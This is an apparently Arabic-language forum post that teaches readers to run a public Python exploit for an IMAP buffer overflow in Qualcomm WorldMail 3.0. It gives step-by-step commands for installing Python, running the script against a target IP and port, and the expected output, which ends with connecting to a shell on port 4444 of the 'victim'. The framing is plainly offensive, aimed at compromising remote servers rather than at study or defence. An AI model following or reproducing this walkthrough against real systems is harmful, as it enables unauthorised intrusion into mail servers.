سلام Python هي لغة عادة تستخدم في تطوير السوفت وير ولغة تستخدم بكثره نطبق الشرح على ثغرة Eudora Qualcomm WorldMail ذي ثغرة موجودة في برنامج Eudora البرنامج يستخدم في طبيقات الايميلات طيب كيف الحين نستثمر الثغره انسخ الكود التالي Eudora Qualcomm WorldMail وحطه في المفكره واحفظه بامتداد py مثال eudora.py حمل برنامج Python كلك يمين وحفظ باسم تنصيب البرنامج سهل مايحتاج شرح <<<<<<<<< الذمة على Next بعد التنصيب راح يتكود مجلد في الدرايف C باسم Python24 اوكيه الحين نجي لتطبيق الثغرة :- لنفرض انك حفظت eudora.py في المسار التالي
كود PHP:
C:********s and Settingsv1per-haCker areaDesktophaCking_laBexploitRemote
روح على ابدا -----> تشغيل------> cmd راح تفتح شاشة الدوس Doc واكتب الامر
كود PHP:
cd C:********s and Settingsv1per-haCker areaDesktophaCking_laBexploitRemote
الان طبق الامر التالي لتطبيق الاكسبلوت
كود PHP:
eudora.py
راح يجيك طريقة الاستثمار كالتالي
كود PHP:
C:********s and Settingsv1per-haCker areaDesktophaCking_laBexploitRemote>eudora.py Eudora Qualcomm WorldMail 3.0 IMAPd Service 6.1.19.0Overflow. Discovered by Tim Shelton - security-advisories@acs-inc.com Coded by mati@see-security.com Usage: eudora-imap-LIST.py <ip> <port>
لنفرض ان الثغرة موجوده على الاي بي 192.168.1.162 <<<< ماخذه من الاكسبلويت ونفرض البورت 4444 رايح يكون التطبيق كالتالي
كود PHP:
eudora.py 192.168.1.162 4444
اذا كانت المخرجات كالتالي
كود PHP:
Discovered by Tim Shelton - security-advisories@acs-inc.com Coded by mati@see-security.com [+] Connecting [+] * OK WorldMail IMAP4 Server 6.1.19.0 ready [+] Look Maa - No authentication! [+] Sending evil buffer... [+] Done [+] Connect to port 4444 on victim IP - Muhahaha!